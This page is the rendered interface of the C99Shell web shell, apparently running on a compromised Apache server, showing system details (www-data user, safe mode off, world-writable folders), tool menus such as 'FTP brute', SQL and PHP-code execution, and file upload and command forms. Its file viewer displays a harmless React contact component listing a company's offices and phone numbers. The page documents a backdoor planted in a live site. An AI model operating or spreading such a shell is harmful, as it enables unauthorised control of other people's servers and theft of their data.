!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache/2.4.41 (Ubuntu). PHP/8.0.30 

uname -a: Linux apirnd 5.4.0-204-generic #224-Ubuntu SMP Thu Dec 5 13:38:28 UTC 2024 x86_64 

uid=33(www-data) gid=33(www-data) groups=33(www-data) 

Safe-mode: OFF (not secure)

/var/www/html/pmb/src/components/contact/   drwxrwxrwx
Free 13.04 GB of 57.97 GB (22.5%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ContactInfo.js (7.44 KB)      -rwxrwxrwx
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
function ContactInfo() {
  const style = {
    para: { color: "#7e7e7e", fontWeight: 400, fontSize: "16px" },
    para2: { fontWeight: 700, fontSize: "24px" },
    withTitle: {
      fontSize: "20px",
      fontWeight: 700,
      lineHeight: "1.1em",
      color: "#E91A2F",
    },

    title: {
      fontSize: "40px",
      fontWeight: 800,
      lineHeight: "1.1em",
      color: "#343940",
    },
  };
  return (
    <>
      <section className="section pb-4">
        <div className="container">
          <div className="row justify-content-center">
            <div className="col-12 text-center">
              <div className="section-title mb-4 pb-2">
                <h2 className="" style={style.withTitle}>
                  How to Find US
                </h2>
                <h2 className="title mx-auto mb-0" style={style.title}>
                  Our Contact
                </h2>
              </div>
            </div>
          </div>
          <div className="row">
            <div className="col-lg-3 col-xl-3 col-md-6">
              <div className="card contact-detail text-center border-0">
                <div className="card-body p-0">
                  <div className="icon">
                    <img
                      src="images/contact/1483336.png"
                      className="avatar avatar-small "
                      alt=""
                    />
                  </div>
                  <div className="content mt-3 mb-2">
                    <h4 style={style.para2}>Address 1</h4>
                    <p style={style.para}>
                      PMB Global Limited Unit:1001, 10/F, Kwong Fat Commercial
                      Building 582-588 Canton Road, Kowloon, Hong Kong
                      <br /> Tel: +852-8191-4150 <br /> Fax: +852-2783-7457
                    </p>
                    {/* <a
                      href="https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d39206.002432144705!2d-95.4973981212445!3d29.709510002925988!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x8640c16de81f3ca5%3A0xf43e0b60ae539ac9!2sGerald+D.+Hines+Waterwall+Park!5e0!3m2!1sen!2sin!4v1566305861440!5m2!1sen!2sin"
                      className="video-play-icon h6 text-primary"
                    >
                      View on Google map
                    </a> */}
                  </div>
                </div>
              </div>
            </div>

            <div className="col-lg-3 col-xl-3 col-md-6">
              <div className="card contact-detail text-center border-0">
                <div className="card-body p-0">
                  <div className="icon">
                    <img
                      src="images/contact/1483336.png"
                      className="avatar avatar-small"
                      alt=""
                    />
                  </div>
                  <div className="content mt-3 mb-2">
                    <h4 style={style.para2}>Address 2</h4>

                    <p href="mailto:contact@example.com" style={style.para}>
                      PMB Global PTE LTD 10 ANSON ROAD #10-11 INTERNATIONAL
                      PLAZA SINGAPORE
                      <br /> Tel: +65 8206 7200 <br /> Fax: +65 6225 2042
                    </p>
                  </div>
                </div>
              </div>
            </div>

            <div className="col-lg-3 col-xl-3 col-md-6">
              <div className="card contact-detail text-center border-0">
                <div className="card-body p-0">
                  <div className="icon">
                    <img
                      src="images/contact/1483336.png"
                      className="avatar avatar-small"
                      alt=""
                    />
                  </div>
                  <div className="content mt-3 mb-2">
                    <h4 style={style.para2}>Address 4</h4>
                    <p style={style.para}>
                      PMB FZE SM OFFICE, 255B AJMAN FREE ZONE AJMAN, UAE
                      <br /> Tel: +971-67-443866 <br /> Fax: +971-56-7689794
                    </p>
                  </div>
                </div>
              </div>
            </div>

            <div className="col-lg-3 col-xl-3 col-md-6">
              <div className="card contact-detail text-center border-0">
                <div className="card-body p-0">
                  <div className="icon">
                    <img
                      src="images/contact/1483336.png"
                      className="avatar avatar-small"
                      alt=""
                    />
                  </div>
                  <div className="content mt-3 mb-2">
                    <h4 style={style.para2}>Address 3</h4>

                    <p href="tel:+152534-468-854" style={style.para}>
                      PMB Communication Ltd Hs# 4/A, Road#16
                      DHANMONDI,DHAKA,BANGLADESH
                      <br /> Tel: +880-2-9117865 <br /> Fax: +880-2-9117714
                    </p>
                  </div>
                </div>
              </div>
            </div>
          </div>

          <div className="row mt-4 pt-4 mb-4">
            <div className="col-md-4">
              <div className="card contact-detail text-center border-0">
                <div className="card-body p-0">
                  <div className="icon">
                    <img
                      src="images/contact/8368463.png"
                      className="avatar avatar-small"
                      alt=""
                    />
                  </div>
                  <div className="content mt-3">
                    <h4 style={style.para2}>Email</h4>

                    <a href="mailto:contact@example.com" style={style.para}>
                      contact@example.com
                    </a>
                  </div>
                </div>
              </div>
            </div>

            <div className="col-md-4">
              <div className="card contact-detail text-center border-0">
                <div className="card-body p-0">
                  <div className="icon">
                    <img
                      src="images/contact/phone.jpg"
                      className="avatar avatar-small"
                      alt=""
                    />
                  </div>
                  <div className="content mt-3">
                    <h4 style={style.para2}>Phone</h4>

                    <a href="tel:+152534-468-854" style={style.para}>
                      +(62) 800-567-8990
                    </a>
                  </div>
                </div>
              </div>
            </div>

            <div className="col-md-4">
              <div className="card contact-detail text-center border-0">
                <div className="card-body p-0">
                  <div className="icon">
                    <img
                      src="images/contact/hour.jpg"
                      className="avatar avatar-small"
                      alt=""
                    />
                  </div>
                  <div className="content mt-3">
                    <h4 style={style.para2}>Opening Hours</h4>
                    <p style={style.para}>09:00 AM – 18:00 PM</p>
                  </div>
                </div>
              </div>
            </div>
          </div>
        </div>
      </section>
    </>
  );
}

export default ContactInfo;

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0065 ]--